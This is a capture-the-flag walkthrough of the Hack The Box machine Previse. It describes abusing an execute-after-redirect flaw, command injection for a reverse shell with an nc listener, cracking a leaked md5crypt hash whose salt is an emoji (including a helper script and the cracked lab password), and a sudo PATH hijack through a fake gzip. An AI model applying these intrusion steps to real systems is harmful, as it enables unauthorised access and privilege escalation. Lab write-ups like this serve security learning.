HTB Previse
This write-up or walkthrough is for those who are facing issues while completing the challenge. It's okay to go through walkthroughs and write-ups if you are stuck somewhere in between; you will only learn something new that you might have overlooked. I'm not going to explain every command I use (I assume at this point you are familiar with basic commands and their options).
First, add the hostname (previse.htb) and the IP address to your /etc/hosts file.
One of the most classic steps, which everyone does, is running a port scan with Nmap. It is the initial phase of information gathering.
#nmap -sS -sC -sV -A -T4 -Pn 10.10.11.104
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 17:19 GMT
Nmap scan report for previse.htb (10.10.11.104)
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 54045/tcp)
HOP RTT ADDRESS
1 323.97 ms 10.10.14.1
2 324.16 ms previse.htb (10.10.11.104)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.49 seconds.
Now move on to Gobuster to enumerate directories and PHP files (dirb, dirsearch, wfuzz and others work just as well). The PHP pages used below (nav.php, accounts.php, files.php, file_logs.php) come out of this enumeration.
Among them, nav.php is the navigation menu and accounts.php is the page for creating an account. Requesting accounts.php while unauthenticated returns a redirect to login.php, but the response body still carries the account-creation form: the server keeps executing after issuing the redirect. Intercept the traffic with Burp Suite and either catch the response and change the 302 redirect into a 200 so the form renders in the browser, or send the form fields straight to accounts.php as a POST. The account is created without any check that you are logged in.
After creating the account, go to login.php and log in. Then open files.php and download SITEBACKUP.ZIP; extract it and read config.php, which contains the MySQL credentials.
For the reverse shell, go to file_logs.php, click the Submit button and intercept the request in Burp Suite. The value the form sends ends up inside a command that the server executes, so a command-injection payload that starts a reverse shell can be appended to it.
Before forwarding the modified request, do not forget to start the listener: nc -nlvp 4444
The shell you get back is not a proper TTY, so upgrade it to a stable one with: python -c 'import pty; pty.spawn("/bin/bash")'
Now connect to the MySQL database. I used: mysql -u root -D previse -p . You already have the credentials from config.php inside SITEBACKUP.ZIP. List the tables and select the username and password columns from the table that stores the web users to get the password hash of m4lwhere.
Now look closely at the salt between the second and third $ of the hash. It is not plain text: it is the salt-shaker emoji (U+1F9C2), which in a console that does not speak UTF-8 shows up as the garbled ≡ƒºé. Those four glyphs are exactly how the emoji's four UTF-8 bytes (f0 9f a7 82) render in the CP437 code page. The hash only cracks if the file you feed to the cracker contains those four bytes, so write the emoji itself (or its escaped bytes) into the hash file, never the garbled rendering.
User : m4lwhere
password-hash : $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
HINT: ≡ƒºé is 🧂 (U+1F9C2) as displayed by a CP437 console.
To crack the password I used Hashcat (the hash is md5crypt, hashcat mode 500). John the Ripper works as well; Medusa is an online login brute-forcer, not a hash cracker, so it does not apply here. I used my own wordlist; rockyou.txt or another list from SecLists also works. The John command is: sudo john --format=md5crypt-long --wordlist=/root/wordlist.txt pass.hash
The password we get is ilovecody112235! . Now log in to the machine directly over SSH as m4lwhere and grab user.txt.
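The salt-handling step above, as an added example that is not part of the original write-up: it writes the m4lwhere hash to a file byte for byte, checks that the salt really holds the four UTF-8 bytes of U+1F9C2 rather than the CP437 rendering ≡ƒºé, and prints the hashcat (mode 500) and John (md5crypt-long) commands. The output file name and the wordlist path are assumptions; the crackers themselves are not invoked.

```shell
#!/bin/sh
# Added example, not code from the original write-up.
# The m4lwhere hash is md5crypt ($1$) and its salt contains U+1F9C2 (salt
# shaker), i.e. the four UTF-8 bytes f0 9f a7 82. A CP437 console renders
# those bytes as "≡ƒºé"; pasting that rendering into a UTF-8 file gives
# nine different bytes and the hash will never crack. Build the file from
# escaped bytes and verify it before spending cracking time on it.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
HASH_FILE="$WORK/pass.hash"                    # assumed file name
MOJIBAKE_FILE="$WORK/wrong.hash"               # the broken variant, for contrast
WORDLIST="/usr/share/wordlists/rockyou.txt"    # assumed wordlist path

# Correct file: the emoji written as octal escapes (\360\237\247\202 = f0 9f a7 82).
write_hash_file() {
    printf '$1$\360\237\247\202llol$DQpmdvnb7EeuO6UaqRItf.\n' > "$HASH_FILE"
}

# What you get by copying the CP437 rendering "≡ƒºé" into a UTF-8 file:
# U+2261 U+0192 U+00BA U+00E9 -> e2 89 a1 c6 92 c2 ba c3 a9 (nine bytes).
write_mojibake_file() {
    printf '$1$\342\211\241\306\222\302\272\303\251llol$DQpmdvnb7EeuO6UaqRItf.\n' > "$MOJIBAKE_FILE"
}

# Return 0 when the file starts with "$1$" (24 31 24), the four emoji bytes
# and "llol$" (6c 6c 6f 6c 24); 1 otherwise.
check_salt_bytes() {
    hex=$(od -A n -t x1 "$1" | tr -d ' \n')
    case "$hex" in
        243124f09fa7826c6c6f6c24*) return 0 ;;
        *) return 1 ;;
    esac
}

# Size of the correct file: 3 ("$1$") + 4 (emoji) + 5 ("llol$") + 22 (hash) + newline = 35.
hash_byte_count() {
    wc -c < "$HASH_FILE" | tr -d ' '
}

# Cracking commands, echoed rather than run: md5crypt is hashcat mode 500, and
# John's md5crypt-long format is the safe choice for an unusual salt.
crack_commands() {
    echo "hashcat -m 500 $HASH_FILE $WORDLIST"
    echo "john --format=md5crypt-long --wordlist=$WORDLIST $HASH_FILE"
}

write_hash_file
write_mojibake_file
if check_salt_bytes "$HASH_FILE"; then
    echo "salt bytes OK in $HASH_FILE ($(hash_byte_count) bytes)"
fi
if ! check_salt_bytes "$MOJIBAKE_FILE"; then
    echo "mojibake salt in $MOJIBAKE_FILE: fix the encoding before cracking"
fi
crack_commands
```

Run the check against whatever file you pasted the hash into: if od shows e2 89 a1 where f0 9f a7 82 should be, the terminal or editor transcoded the emoji and every candidate password will be rejected for a reason that has nothing to do with the wordlist.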
Now on to privilege escalation. Run sudo -l to see which commands or scripts the user may run as root. Check the Defaults line of that output as well: the next step only works if secure_path is not set there, because otherwise sudo replaces your PATH with its own.
Reading access_backup.sh (cat) shows that it calls gzip by its bare name rather than by an absolute path, so the gzip that actually runs is whichever one is found first on PATH. I changed directory to /tmp and checked its contents, then created a script named gzip there that opens a reverse TCP connection back to my listener, and started listening on that port. Make the script executable (chmod 777 gzip; chmod +x is enough), prepend the directory to PATH with export PATH=$(pwd):$PATH, and run access_backup.sh through sudo.
Note: $(pwd) is expanded at the moment the export runs, so you must be inside /tmp when you type it (or write export PATH=/tmp:$PATH explicitly). PATH lookup never searches the current directory on its own; it is the leading /tmp entry that makes the script's gzip call land on your file.